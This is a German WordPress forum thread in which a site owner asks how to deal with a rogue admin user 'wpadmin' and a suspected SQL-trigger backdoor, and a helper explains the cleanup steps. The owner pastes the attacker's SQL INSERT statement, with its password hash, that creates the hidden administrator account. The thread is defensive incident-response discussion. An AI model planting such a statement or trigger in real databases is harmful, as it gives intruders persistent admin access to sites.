Backdoor via SQL Trigger

  • Hallo,

    Unter https://www.labut.at wurde kürzlich ein User wpadmin (wp-security@hotmail.com) angelegt,
    obwohl die Registrierung deaktiviert ist.

    Den User habe ich gelöscht. Unter https://lukeleal.com/research/posts…or-sql-trigger/ stieß ich dann auch bald auf eine mögliche Ursache.

    Wenn ich das richtig verstehe sollte es über die wp-config.php möglich sein die "trigger privlege" des SQL user einzuschränken. Könnt ihr mir vielleicht sagen, welche Eintragung ich dafür vornehmen müsste.

    • Anzeige

    Hallo!

    Wenn du gerade an deiner Website arbeitest oder dein aktuelles Hosting überdenkst: Wir betreiben mit NetzLiving eine Hosting-Plattform, die speziell auf Performance, Sicherheit und einfache Verwaltung ausgelegt ist.

    • ✔️ Schnelle Ladezeiten (optimiert für WordPress & Co.)
    • ✔️ Deutsche Server & DSGVO-konform
    • ✔️ Persönlicher Support (kein 0815-Ticket-System)

    Mehr erfahren

  • Offenbar wurde der Website gehackt. Alles auf dem Server inkl. Datenbank ist als kompromitiert zu betrachten.

    Die SQL-Trigger Beschreibung setzt voraus, dass der Website bereits anderweitig kompromitiert wurde und ist nur eine Rückfallebene des Angreifers.

    Zitat

    A real life case would be an attacker that already has obtained unauthorized access to a website and wants a persistent backdoor for regaining unauthorized access..


    Jemand hat eine Sicherheitslücke in Deinem Theme oder in einem Plugin oder in WordPress oder auf noch andere Art und Weise ausgenutzt, um (mindestens) diesen einen neuen Benutzer anzulegen.

    Ein nachträglicher Versuch, eine mögliche andere Hinterlassenschaft des Hacks (SQL-Trigger) etwas einzugrenzen, ist nicht ausreichend, es beseitigt nicht die Sicherheitslücke.

    Das allgemeine Vorgehen bei einem Hack ist z.B. hier beschrieben, das könntest Du mit jemandem mit WordPress Erfahrung bei Dir im näheren Umfeld zusammen durchgehen.

    Dabei am Wichtigsten wäre, die für den Hack genutzte(n) Lücke(n) zu ermitteln, damit das nicht wieder passiert.

  • Danke für die Infos.
    Der User wpadmin wurde zwar bislang nicht erneut angelegt, doch findet sich im SQL Export ...

    SQL
    INSERT INTO `xxxxxx`.`wpxxx_users` (`ID`, `user_login`, `user_pass`, `user_nicename`, `user_email`, `user_url`, `user_registered`, `user_activation_key`, `user_status`, `display_name`) VALUES (@nextWpUsersID, 'wpadmin', '$1$yUXpYwXN$JhwaoGJxViPhtGdNG5UZs1', 'wpadmin', 'wp-security@hotmail.com', 'http://wordpress.com', '2014-06-08 00:00:00', '', '0', 'Kris');

    Ich möchte versuchen auf Basis verfügbarer Anleitungen der Sicherheitslücke auf die Spuren zu kommen. Etwas überrascht bin ich, dass der Wordfence Scan stets "no issues found" zurückliefert. In den Scan Options sind die "files outside your WP installation" bzw. "images, binary and other files" jedenfalls inkludiert.

Jetzt mitmachen!

Sie haben noch kein Benutzerkonto auf unserer Seite? Registrieren Sie sich kostenlos und nehmen Sie an unserer Community teil!